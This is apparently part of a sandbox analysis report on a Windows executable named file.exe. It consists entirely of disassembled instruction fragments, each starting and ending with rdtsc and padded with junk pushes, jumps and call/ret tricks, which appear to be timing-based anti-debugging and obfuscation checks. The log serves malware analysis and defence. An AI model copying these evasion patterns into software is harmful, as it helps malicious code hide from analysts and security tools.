                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C419 second address: 136C430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD323h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C430 second address: 136C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C445 second address: 136C457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0F04CBD316h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C457 second address: 136C4B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F0527E406h 0x00000008 jp 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F0F0527E412h 0x00000016 jmp 00007F0F0527E413h 0x0000001b pop ebx 0x0000001c jmp 00007F0F0527E40Fh 0x00000021 pushad 0x00000022 jmp 00007F0F0527E40Fh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4BA4 second address: 13B4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4BA8 second address: 13B4BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B70AF second address: 13B70C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD31Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B70C5 second address: 13B70CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B70CB second address: 13B70D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA9B3 second address: 13BA9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0F0527E406h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BA9C5 second address: 13BA9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF34 second address: 13BAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF38 second address: 13BAF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF3C second address: 13BAF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAF42 second address: 13BAFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0F04CBD318h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jl 00007F0F04CBD31Ch 0x0000002c mov edi, dword ptr [ebp+122D39E0h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F04CBD318h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add bx, 372Fh 0x00000053 pushad 0x00000054 mov edi, dword ptr [ebp+122D2378h] 0x0000005a mov eax, dword ptr [ebp+122D57FBh] 0x00000060 popad 0x00000061 push 00000000h 0x00000063 push ecx 0x00000064 push esi 0x00000065 mov dword ptr [ebp+1248114Dh], esi 0x0000006b pop ebx 0x0000006c pop edi 0x0000006d push eax 0x0000006e je 00007F0F04CBD324h 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BBF4A second address: 13BBF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0F0527E408h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 movzx ebx, dx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D2598h], ebx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F0527E412h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BC142 second address: 13BC200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD323h 0x0000000b popad 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D3A40h] 0x00000013 jmp 00007F0F04CBD320h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f cld 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F0F04CBD318h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0D85h] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F0F04CBD318h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 jmp 00007F0F04CBD329h 0x00000066 sub ebx, dword ptr [ebp+122D1C8Bh] 0x0000006c push FFFFFFFFh 0x0000006e xor ebx, 4996BBB4h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F0F04CBD31Eh 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD01A second address: 13BD0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jmp 00007F0F0527E417h 0x0000000e nop 0x0000000f sbb edi, 2FF08F2Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c cmc 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+1248D1F9h], ecx 0x0000002a mov eax, dword ptr [ebp+122D0E91h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D1F76h] 0x00000050 xor dword ptr [ebp+122D2AA3h], edi 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b call 00007F0F0527E408h 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], edx 0x00000065 add dword ptr [esp+04h], 00000019h 0x0000006d inc edx 0x0000006e push edx 0x0000006f ret 0x00000070 pop edx 0x00000071 ret 0x00000072 movsx ebx, si 0x00000075 push eax 0x00000076 jp 00007F0F0527E424h 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEF79 second address: 13BEF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BEF7D second address: 13BEFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E40Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F0F0527E40Ch 0x00000013 jnp 00007F0F0527E406h 0x00000019 jmp 00007F0F0527E419h 0x0000001e push ecx 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF78E second address: 13BF7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD328h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD323h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF7C0 second address: 13BF7CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF7CD second address: 13BF7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1689 second address: 13C16A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF7D1 second address: 13BF7DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C26E9 second address: 13C26F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C17EB second address: 13C17F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C17F1 second address: 13C17F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C18F8 second address: 13C1902 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1902 second address: 13C1908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1908 second address: 13C190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C29CD second address: 13C29D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C7694 second address: 13C76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C76A9 second address: 13C76AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C76AD second address: 13C76C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F04CBD322h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C76C9 second address: 13C771B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b and edi, 4DA04C99h 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 jo 00007F0F0527E407h 0x0000001a cmc 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0F0527E408h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8816 second address: 13C881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C881A second address: 13C881E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C984E second address: 13C98C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e call 00007F0F04CBD323h 0x00000013 mov dword ptr [ebp+122D30E4h], eax 0x00000019 pop edi 0x0000001a mov dword ptr [ebp+122D1A47h], edi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F0F04CBD318h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c pushad 0x0000003d cld 0x0000003e mov ecx, edx 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 jl 00007F0F04CBD320h 0x00000048 pushad 0x00000049 jl 00007F0F04CBD316h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C98C8 second address: 13C98CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C98CE second address: 13C98DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0F04CBD316h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA9C2 second address: 13CA9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA9C6 second address: 13CAA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Ah 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F04CBD318h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sbb bx, BCB7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jns 00007F0F04CBD317h 0x00000050 mov dword ptr [ebp+122D1F36h], eax 0x00000056 push 00000000h 0x00000058 mov dword ptr [ebp+12480687h], eax 0x0000005e xchg eax, esi 0x0000005f jmp 00007F0F04CBD325h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CAA53 second address: 13CAA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBBBF second address: 13CBBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBBC3 second address: 13CBC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F0F0527E411h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F0527E408h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F0F0527E411h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2196h], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0F0527E408h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov bx, di 0x00000055 mov dword ptr [ebp+122D2BC5h], esi 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0F0527E413h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jp 00007F0F0527E406h 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89A4 second address: 13C89A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89A9 second address: 13C89CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E416h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89CD second address: 13C89D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C89D1 second address: 13C89D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C48C0 second address: 13C48CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C48CA second address: 13C4929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+1248114Dh], edi 0x0000001e mov bl, F2h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 movsx ebx, di 0x0000002a mov eax, dword ptr [ebp+122D0EBDh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a push FFFFFFFFh 0x0000004c movzx edi, dx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4929 second address: 13C492F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CBE5C second address: 13CBE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2588 second address: 13D25A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25A3 second address: 13D25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25A9 second address: 13D25B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25B2 second address: 13D25B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D25B8 second address: 13D25BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2724 second address: 13D2729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D28B8 second address: 13D28C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D28C2 second address: 13D28D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2A28 second address: 13D2A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2A2E second address: 13D2A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5E70 second address: 13B5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D77EC second address: 13D77F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D77F0 second address: 13D77F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78C0 second address: 13D78C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78C4 second address: 13D78E7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jbe 00007F0F04CBD31Ch 0x00000013 ja 00007F0F04CBD316h 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78E7 second address: 13D78EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D78EB second address: 13D7903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F0F04CBD31Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE9FA second address: 13DEA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373022 second address: 1373030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
